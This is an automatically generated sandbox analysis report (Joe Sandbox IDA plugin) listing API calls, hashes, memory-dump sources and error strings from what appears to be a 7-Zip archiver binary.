                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ErrorLastmemmove
                                                                • String ID:
                                                                • API String ID: 3561842085-0
                                                                • Opcode ID: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
                                                                • Instruction ID: ca9f0d77fff63cc07ad5271c3f9f788609439450b9cd4725013c57a1796a6e6f
                                                                • Opcode Fuzzy Hash: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
                                                                • Instruction Fuzzy Hash: 17316172214A4091CB24DF24E45069E7371FB99BA4F585235FBAE477B8DF38C59ACB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID:
                                                                • API String ID: 1475443563-0
                                                                • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                • Instruction ID: 43d0d546b4f71406af6fbc08605e0f2876a03930f0f176527c7d77f947d4f8af
                                                                • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                • Instruction Fuzzy Hash: 771102B2384B4192EB0C9F669C913E82665DB19FC5F85A034CE058F345EF78DA89C344
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00113C2A
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00113C36
                                                                • _CxxThrowException.MSVCRT ref: 00113C54
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00113C80
                                                                • _CxxThrowException.MSVCRT ref: 00113C9E
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2296236218-0
                                                                • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                • Instruction ID: 87e24c90e347c4c8a88d3c4e89b55fc4064a70d38c93f7f498ae13714c4e5045
                                                                • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                • Instruction Fuzzy Hash: DF2190B2704B44C6DB14DF26E85039DB7A1FB98B89F448129DA8947768EF78C98AC740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                • Instruction ID: 126221d2bb37bdc8a84f776aabb6afa0a1b5ab3ce1b7aaa28358526bf85c517c
                                                                • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                • Instruction Fuzzy Hash: 3D018023702954A6DA28EF26D9105E9A320F797FA4B1C8331EF6D17794CF34D8A2C340
                                                                APIs
                                                                • free.MSVCRT ref: 00157DA9
                                                                • free.MSVCRT ref: 00157DB2
                                                                • free.MSVCRT ref: 00157DE5
                                                                • free.MSVCRT ref: 00157DF2
                                                                • free.MSVCRT ref: 00157DFB
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 001394DB
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 001394E3
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 001394F0
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 0013951C
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 00139525
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 0013952D
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 0013953A
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                • Instruction ID: e7be463db8b75171799d46a2195a4d326a35271701281a84faa41d0dafd1cad4
                                                                • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                • Instruction Fuzzy Hash: 2C018F23702940D9CA1AEF25EC612A82324EB56FA8F580231EF1D4B355EF31C896C380
                                                                APIs
                                                                • free.MSVCRT ref: 00133877
                                                                  • Part of subcall function 00130BBC: free.MSVCRT ref: 00130BCC
                                                                  • Part of subcall function 00130BBC: free.MSVCRT ref: 00130BD5
                                                                  • Part of subcall function 00130BBC: free.MSVCRT ref: 00130C00
                                                                  • Part of subcall function 00130BBC: free.MSVCRT ref: 00130C08
                                                                  • Part of subcall function 00131474: free.MSVCRT ref: 001314A6
                                                                  • Part of subcall function 00131474: free.MSVCRT ref: 001314AF
                                                                  • Part of subcall function 00131474: free.MSVCRT ref: 001314B8
                                                                  • Part of subcall function 00131474: free.MSVCRT ref: 001314C0
                                                                • free.MSVCRT ref: 00133892
                                                                • free.MSVCRT ref: 0013389B
                                                                • free.MSVCRT ref: 001338C6
                                                                • free.MSVCRT ref: 001338CE
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                • Instruction ID: ac9a13f6c0d6aaea7eb8390833bd3664235da9558639c0f29f2e0430e503c3d8
                                                                • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                • Instruction Fuzzy Hash: 1FF03123B12850A6CA19FE26DD511AC6320FB96F94B0D4371EF2D4B751DF60C9B28340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                • Instruction ID: 493db5245d0f2859f83fd5c89a9074212b5e32544322a43093774c10cfbebd6a
                                                                • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                • Instruction Fuzzy Hash: 95F0301371199499CA28EE26DD911A86320AFA7BE8B1D4271FF1E57755EF30C8A28340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                • Instruction ID: 2a18638dca3580a126a2815c0ad6eb38a895c5db3ecd50c11e29647b989f3157
                                                                • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                • Instruction Fuzzy Hash: 70F090537019849ECA14EE26DC812A83320AF66BA9F1C4271FF2D17755EF30C8E28340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                • Instruction ID: f07a4a62cf19f3cf9025ce2cd95010ad77eb49cb9f5b6d9bff93ed129f1d94ed
                                                                • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                • Instruction Fuzzy Hash: 34F03023711954AACB29EE3AED511AC6320EBA6FD471D0271EF2D4B759DF30C8A28340
                                                                APIs
                                                                • free.MSVCRT ref: 001576AF
                                                                • free.MSVCRT ref: 001576BB
                                                                • free.MSVCRT ref: 001576C7
                                                                • free.MSVCRT ref: 001576D3
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B335
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B342
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B34E
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B358
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B362
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B36C
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B376
                                                                  • Part of subcall function 0015B310: free.MSVCRT ref: 0015B380
                                                                • free.MSVCRT ref: 001576E4
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                • Instruction ID: 2df1fff879b8a91e5d028cb1c30a1a6f820f75a2b71bb4fec7bc2f3404e8b90c
                                                                • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                • Instruction Fuzzy Hash: 87E0C93221198091CA54EF35D8961EC2360E7AAB58F1C0271EE2E8E362DF20C9A78350
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$memmove
                                                                • String ID: Internal collision in update action set
                                                                • API String ID: 265668421-2378581463
                                                                • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                • Instruction ID: b6a5511036d2a25d5988bb04460db05e752fa0443a6ab41925389cc0de368dd1
                                                                • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                • Instruction Fuzzy Hash: 9A417533308685CACB36CB5AE45476E7B60F39878DF048119EF990BB58DB78C589CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: =
                                                                • API String ID: 1294909896-2525689732
                                                                • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                • Instruction ID: 9286b2ba9de72fafce5a9224d93dc2dc5253a5e97427d3bc4d6ac26c5cf77c0f
                                                                • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                • Instruction Fuzzy Hash: 7631E633319A80D6CB14DF55E49039EA731F7E2765F940221FB9E47A68DB78C989CB00
                                                                APIs
                                                                • free.MSVCRT ref: 00146E91
                                                                  • Part of subcall function 00113518: free.MSVCRT ref: 00113551
                                                                  • Part of subcall function 00113314: memmove.MSVCRT ref: 00113339
                                                                • free.MSVCRT ref: 00146E83
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID: exe
                                                                • API String ID: 1534225298-1801697008
                                                                • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                • Instruction ID: e963a0a67b74f6382e16893472fcf87156ba597ca515819e227f0dd031373c26
                                                                • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                • Instruction Fuzzy Hash: 2F31896330494196CE34EB25E8501DEBB31F7A67D4F845221EBAE47A79DF38C68AC700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ByteStringmemmove
                                                                • String ID:
                                                                • API String ID: 400576877-0
                                                                • Opcode ID: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
                                                                • Instruction ID: ec775b7e4dc87499c99c10735836a992ca538067d705f2e334116130a1f83283
                                                                • Opcode Fuzzy Hash: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
                                                                • Instruction Fuzzy Hash: 5D21677331574091DB249F55E6503AD6260FB887A4F484235EFAE4B794DFB8C8A6C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$wcscmp
                                                                • String ID:
                                                                • API String ID: 4021281200-0
                                                                • Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                • Instruction ID: 4f5241d610b49b79a525c23fcd7c052683f9af0a5b9467b489c3d98c382ec608
                                                                • Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                • Instruction Fuzzy Hash: 8F21047731474092DB30EF26E8412A97360E7D9BE4F085321EEAA4B794EFB4C586CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: Unsupported charset:
                                                                • API String ID: 1294909896-616772432
                                                                • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                • Instruction ID: 4e1d43bbd0f6c53d42de19c6b5e83174fcf3d3d2a58e4bd30733eaef981dadca
                                                                • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                • Instruction Fuzzy Hash: DC216062608A0096DA24DB18E8903D97721E7D97E4F544336EAAE077A9CF68CAC6C740
                                                                APIs
                                                                  • Part of subcall function 00117D4C: GetFileAttributesW.KERNELBASE ref: 00117D6E
                                                                  • Part of subcall function 00117D4C: GetFileAttributesW.KERNEL32 ref: 00117DA5
                                                                  • Part of subcall function 00117D4C: free.MSVCRT ref: 00117DB2
                                                                • DeleteFileW.KERNEL32 ref: 00116D90
                                                                • DeleteFileW.KERNEL32 ref: 00116DCA
                                                                • free.MSVCRT ref: 00116DDA
                                                                • free.MSVCRT ref: 00116DE8
                                                                  • Part of subcall function 001168A0: SetFileAttributesW.KERNELBASE ref: 001168C7
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: File$Attributesfree$Delete
                                                                • String ID:
                                                                • API String ID: 324319583-0
                                                                • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                • Instruction ID: ada0839392d02d23508fe6206b979a229c1a881c2e83ea8b8c625cc873475e9b
                                                                • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                • Instruction Fuzzy Hash: 3A016D26304A0051CE38AB68BC513E913215BD6BB4F5C1331EDAA8B3E5EF2AC9D68700
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 00122137
                                                                • free.MSVCRT ref: 001221BB
                                                                  • Part of subcall function 00116618: FormatMessageW.KERNEL32 ref: 00116676
                                                                  • Part of subcall function 00116618: LocalFree.KERNEL32 ref: 00116698
                                                                  • Part of subcall function 0011362C: memmove.MSVCRT ref: 00113659
                                                                • free.MSVCRT ref: 00122182
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                • String ID: :
                                                                • API String ID: 1743135865-3653984579
                                                                • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                • Instruction ID: 4da7d633fffaa81f7360e8ac8130f388387355a396cba760d27c0ce1a0482288
                                                                • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                • Instruction Fuzzy Hash: C301336730090091CA25EB25E8402DA6721EBD9BF4F585331BE6E477BDDF28CAC6C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$FileHandleRead
                                                                • String ID:
                                                                • API String ID: 2244327787-0
                                                                • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                • Instruction ID: 6076abeedab9ba608b1ebd70d441eedb066c8199bcb5e4553c7d8eccfb385a43
                                                                • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                • Instruction Fuzzy Hash: 7A012B22760864CBD7255B3D9D403E96294B748BE6F914135FE4ACFB50DB28CCC287C1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs
                                                                • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                • API String ID: 1795875747-932691680
                                                                • Opcode ID: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                • Instruction ID: 967b2e1d024469e3dfbc7f1148d312835f1b4663370342c7a3ce4cc9a2d2baa3
                                                                • Opcode Fuzzy Hash: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                • Instruction Fuzzy Hash: 06015231281904D5DB09EB60EC403E82730EBA5747FC45621ED1E4B664EF38C9C9C382
                                                                APIs
                                                                Memory Dump Source
